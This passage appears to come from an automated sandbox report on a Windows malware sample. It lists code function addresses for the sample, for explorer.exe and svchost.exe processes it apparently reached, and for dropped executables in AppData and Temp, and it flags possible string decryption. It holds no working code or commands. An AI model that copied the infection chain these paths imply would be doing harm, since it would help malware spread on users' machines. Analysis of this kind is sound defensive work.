Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1714DC4	0_2_00007FF6E1714DC4
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E171920C	0_2_00007FF6E171920C
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1716D54	0_2_00007FF6E1716D54
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E17169A4	0_2_00007FF6E17169A4
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E17130F4	0_2_00007FF6E17130F4
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1711928	0_2_00007FF6E1711928
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1705D34	0_2_00007FF6E1705D34
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1719830	0_2_00007FF6E1719830
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E170D834	0_2_00007FF6E170D834
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1713744	0_2_00007FF6E1713744
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E171D358	0_2_00007FF6E171D358
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E171DBAC	0_2_00007FF6E171DBAC
Source: C:\Windows\explorer.exe	Code function: 2_2_07DAC698	2_2_07DAC698
Source: C:\Windows\explorer.exe	Code function: 2_2_07DA4F70	2_2_07DA4F70
Source: C:\Windows\explorer.exe	Code function: 2_2_07DAAEF0	2_2_07DAAEF0
Source: C:\Windows\explorer.exe	Code function: 2_2_07DACE2C	2_2_07DACE2C
Source: C:\Windows\explorer.exe	Code function: 2_2_07DA15B0	2_2_07DA15B0
Source: C:\Windows\explorer.exe	Code function: 2_2_07DA2380	2_2_07DA2380
Source: C:\Windows\explorer.exe	Code function: 2_2_09CB21B0	2_2_09CB21B0
Source: C:\Windows\explorer.exe	Code function: 2_2_09CBDA2C	2_2_09CBDA2C
Source: C:\Windows\explorer.exe	Code function: 2_2_09CB5B70	2_2_09CB5B70
Source: C:\Windows\explorer.exe	Code function: 2_2_09CBBAF0	2_2_09CBBAF0
Source: C:\Windows\explorer.exe	Code function: 2_2_09CBD298	2_2_09CBD298
Source: C:\Windows\explorer.exe	Code function: 2_2_09CB2F80	2_2_09CB2F80
Source: C:\Windows\explorer.exe	Code function: 2_2_0C36A280	2_2_0C36A280
Source: C:\Windows\explorer.exe	Code function: 2_2_0C37A490	2_2_0C37A490
Source: C:\Windows\explorer.exe	Code function: 2_2_0C369CF8	2_2_0C369CF8
Source: C:\Windows\explorer.exe	Code function: 2_2_0C37B4C0	2_2_0C37B4C0
Source: C:\Windows\explorer.exe	Code function: 2_2_0C371E48	2_2_0C371E48
Source: C:\Windows\explorer.exe	Code function: 2_2_0C37EF84	2_2_0C37EF84
Source: C:\Windows\explorer.exe	Code function: 2_2_0C36F7E0	2_2_0C36F7E0
Source: C:\Windows\explorer.exe	Code function: 2_2_0C3540B0	2_2_0C3540B0
Source: C:\Windows\explorer.exe	Code function: 2_2_0C36909C	2_2_0C36909C
Source: C:\Windows\explorer.exe	Code function: 2_2_0C3738EC	2_2_0C3738EC
Source: C:\Windows\explorer.exe	Code function: 2_2_0C36F168	2_2_0C36F168
Source: C:\Windows\explorer.exe	Code function: 2_2_0C354990	2_2_0C354990
Source: C:\Windows\explorer.exe	Code function: 2_2_0C3721F8	2_2_0C3721F8
Source: C:\Windows\explorer.exe	Code function: 2_2_0C37F9CB	2_2_0C37F9CB
Source: C:\Windows\explorer.exe	Code function: 2_2_0C37AAB4	2_2_0C37AAB4
Source: C:\Windows\explorer.exe	Code function: 2_2_0C369AFC	2_2_0C369AFC
Source: C:\Windows\explorer.exe	Code function: 2_2_0C374B24	2_2_0C374B24
Source: C:\Windows\explorer.exe	Code function: 2_2_0C37CB6C	2_2_0C37CB6C
Source: C:\Windows\explorer.exe	Code function: 2_2_0C373B84	2_2_0C373B84
Source: C:\Windows\explorer.exe	Code function: 2_2_0C37D3C0	2_2_0C37D3C0
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC04CB0	2_2_0FC04CB0
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC2DFC0	2_2_0FC2DFC0
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC1AE80	2_2_0FC1AE80
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC22DF8	2_2_0FC22DF8
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC1FD68	2_2_0FC1FD68
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC19C9C	2_2_0FC19C9C
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC2FB84	2_2_0FC2FB84
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC22A48	2_2_0FC22A48
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC1A8F8	2_2_0FC1A8F8
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC24784	2_2_0FC24784
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC2D76C	2_2_0FC2D76C
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC25724	2_2_0FC25724
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC1A6FC	2_2_0FC1A6FC
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC2B6B4	2_2_0FC2B6B4
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC305CB	2_2_0FC305CB
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC05590	2_2_0FC05590
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC244EC	2_2_0FC244EC
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC203E0	2_2_0FC203E0
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC2C0C0	2_2_0FC2C0C0
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC2B090	2_2_0FC2B090
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AB1AA4	3_2_00007FF699AB1AA4
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AB1DF4	3_2_00007FF699AB1DF4
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AB554C	3_2_00007FF699AB554C
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699ACB2DC	3_2_00007FF699ACB2DC
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AC1690	3_2_00007FF699AC1690
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699ACE678	3_2_00007FF699ACE678
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AC4DC4	3_2_00007FF699AC4DC4
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AC920C	3_2_00007FF699AC920C
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AC6D54	3_2_00007FF699AC6D54
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AC69A4	3_2_00007FF699AC69A4
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AC30F4	3_2_00007FF699AC30F4
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AB5D34	3_2_00007FF699AB5D34
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AC1928	3_2_00007FF699AC1928
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699ABD834	3_2_00007FF699ABD834
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AC9830	3_2_00007FF699AC9830
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699ACD358	3_2_00007FF699ACD358
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AC3744	3_2_00007FF699AC3744
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699ACDBAC	3_2_00007FF699ACDBAC
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF7536FD834	4_2_00007FF7536FD834
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF753709830	4_2_00007FF753709830
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF7537030F4	4_2_00007FF7537030F4
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF75370DBAC	4_2_00007FF75370DBAC
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF753703744	4_2_00007FF753703744
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF75370D358	4_2_00007FF75370D358
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF753701690	4_2_00007FF753701690
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF75370B2DC	4_2_00007FF75370B2DC
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF75370E678	4_2_00007FF75370E678
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF7536F1AA4	4_2_00007FF7536F1AA4
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF753706D54	4_2_00007FF753706D54
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF7536F554C	4_2_00007FF7536F554C
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF7536F5D34	4_2_00007FF7536F5D34
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF753701928	4_2_00007FF753701928
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF75370920C	4_2_00007FF75370920C
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF7536F1DF4	4_2_00007FF7536F1DF4
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF753704DC4	4_2_00007FF753704DC4
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF7537069A4	4_2_00007FF7537069A4
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B6DBAC	7_2_00007FF736B6DBAC
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B6D358	7_2_00007FF736B6D358
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B63744	7_2_00007FF736B63744
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B630F4	7_2_00007FF736B630F4
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B5D834	7_2_00007FF736B5D834
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B69830	7_2_00007FF736B69830
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B51DF4	7_2_00007FF736B51DF4
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B6920C	7_2_00007FF736B6920C
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B669A4	7_2_00007FF736B669A4
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B64DC4	7_2_00007FF736B64DC4
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B61928	7_2_00007FF736B61928
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B55D34	7_2_00007FF736B55D34
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B5554C	7_2_00007FF736B5554C
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B66D54	7_2_00007FF736B66D54
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B6B2DC	7_2_00007FF736B6B2DC
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B51AA4	7_2_00007FF736B51AA4
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B6E678	7_2_00007FF736B6E678
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B61690	7_2_00007FF736B61690
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DBFBD8	8_2_00007FF632DBFBD8
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DC5C74	8_2_00007FF632DC5C74
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DA1000	8_2_00007FF632DA1000
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DB73F4	8_2_00007FF632DB73F4
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DC33BC	8_2_00007FF632DC33BC
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DC0B84	8_2_00007FF632DC0B84
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DB2CC4	8_2_00007FF632DB2CC4
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DB1484	8_2_00007FF632DB1484
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DB0C64	8_2_00007FF632DB0C64
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DBD200	8_2_00007FF632DBD200
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DB91B0	8_2_00007FF632DB91B0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DC518C	8_2_00007FF632DC518C
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DA8B20	8_2_00007FF632DA8B20
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DB7AAC	8_2_00007FF632DB7AAC
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DB1280	8_2_00007FF632DB1280
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DB0A60	8_2_00007FF632DB0A60
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DC8A38	8_2_00007FF632DC8A38
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DA9FCD	8_2_00007FF632DA9FCD
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DA979B	8_2_00007FF632DA979B
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DB28C0	8_2_00007FF632DB28C0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DBD880	8_2_00007FF632DBD880
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DB1074	8_2_00007FF632DB1074
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DB5040	8_2_00007FF632DB5040
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DA95FB	8_2_00007FF632DA95FB
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DBCD6C	8_2_00007FF632DBCD6C
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DC2F20	8_2_00007FF632DC2F20
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DB1F30	8_2_00007FF632DB1F30
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DBFBD8	8_2_00007FF632DBFBD8
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DC5728	8_2_00007FF632DC5728
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DC4F10	8_2_00007FF632DC4F10
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DB0E70	8_2_00007FF632DB0E70
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DC5C74	11_2_00007FF632DC5C74
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DA1000	11_2_00007FF632DA1000
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DC4F10	11_2_00007FF632DC4F10
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DBFBD8	11_2_00007FF632DBFBD8
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DB73F4	11_2_00007FF632DB73F4
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DC33BC	11_2_00007FF632DC33BC
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DC0B84	11_2_00007FF632DC0B84
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DB2CC4	11_2_00007FF632DB2CC4
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DB1484	11_2_00007FF632DB1484
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DB0C64	11_2_00007FF632DB0C64
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DBD200	11_2_00007FF632DBD200
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DB91B0	11_2_00007FF632DB91B0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DC518C	11_2_00007FF632DC518C
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DA8B20	11_2_00007FF632DA8B20
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DB7AAC	11_2_00007FF632DB7AAC
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DB1280	11_2_00007FF632DB1280
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DB0A60	11_2_00007FF632DB0A60
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DC8A38	11_2_00007FF632DC8A38
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DA9FCD	11_2_00007FF632DA9FCD
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DA979B	11_2_00007FF632DA979B
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DB28C0	11_2_00007FF632DB28C0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DBD880	11_2_00007FF632DBD880
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DB1074	11_2_00007FF632DB1074
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DB5040	11_2_00007FF632DB5040
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DA95FB	11_2_00007FF632DA95FB
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DBCD6C	11_2_00007FF632DBCD6C
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DC2F20	11_2_00007FF632DC2F20
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DB1F30	11_2_00007FF632DB1F30
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DBFBD8	11_2_00007FF632DBFBD8
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DC5728	11_2_00007FF632DC5728
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DB0E70	11_2_00007FF632DB0E70
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012F1200	11_2_00007FFE012F1200
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE013600BC	11_2_00007FFE013600BC
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012ED120	11_2_00007FFE012ED120
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012DC360	11_2_00007FFE012DC360
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012F2384	11_2_00007FFE012F2384
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012FC429	11_2_00007FFE012FC429
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012D3274	11_2_00007FFE012D3274
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012F62D0	11_2_00007FFE012F62D0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012D233C	11_2_00007FFE012D233C
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012D8310	11_2_00007FFE012D8310
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012E0300	11_2_00007FFE012E0300
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012EF5A4	11_2_00007FFE012EF5A4
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012DF520	11_2_00007FFE012DF520
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE01312740	11_2_00007FFE01312740
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012D26F8	11_2_00007FFE012D26F8
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012E16D0	11_2_00007FFE012E16D0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012D8854	11_2_00007FFE012D8854
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012E28B0	11_2_00007FFE012E28B0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012D5B5C	11_2_00007FFE012D5B5C
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012DFBE0	11_2_00007FFE012DFBE0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE01337BFC	11_2_00007FFE01337BFC
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE01342A68	11_2_00007FFE01342A68
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012EDAC0	11_2_00007FFE012EDAC0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE01300E15	11_2_00007FFE01300E15
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE01378DF8	11_2_00007FFE01378DF8
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE01342C48	11_2_00007FFE01342C48
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012DFF60	11_2_00007FFE012DFF60
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012D2FA0	11_2_00007FFE012D2FA0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012DD030	11_2_00007FFE012DD030
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE012FF000	11_2_00007FFE012FF000
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE01375E64	11_2_00007FFE01375E64
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE126D6AE4	11_2_00007FFE126D6AE4
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE126D2DD0	11_2_00007FFE126D2DD0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE132171CC	11_2_00007FFE132171CC
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE1321D130	11_2_00007FFE1321D130
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE148E3CF0	11_2_00007FFE148E3CF0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE148E1A80	11_2_00007FFE148E1A80
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE148E521C	11_2_00007FFE148E521C
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE148E2D30	11_2_00007FFE148E2D30
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE148E2630	11_2_00007FFE148E2630
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE148E3140	11_2_00007FFE148E3140
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE148E1A80	11_2_00007FFE148E1A80
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE148E37B0	11_2_00007FFE148E37B0
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E8920C	13_2_00007FF7F4E8920C
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E71DF4	13_2_00007FF7F4E71DF4
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E84DC4	13_2_00007FF7F4E84DC4
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E869A4	13_2_00007FF7F4E869A4
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E7554C	13_2_00007FF7F4E7554C
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E86D54	13_2_00007FF7F4E86D54
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E81928	13_2_00007FF7F4E81928
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E75D34	13_2_00007FF7F4E75D34
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E8B2DC	13_2_00007FF7F4E8B2DC
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E71AA4	13_2_00007FF7F4E71AA4
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E81690	13_2_00007FF7F4E81690
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E8E678	13_2_00007FF7F4E8E678
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E8DBAC	13_2_00007FF7F4E8DBAC
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E8D358	13_2_00007FF7F4E8D358
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E83744	13_2_00007FF7F4E83744
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E830F4	13_2_00007FF7F4E830F4
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E89830	13_2_00007FF7F4E89830
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E7D834	13_2_00007FF7F4E7D834

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: String function: 00007FF632DA25F0 appears 100 times
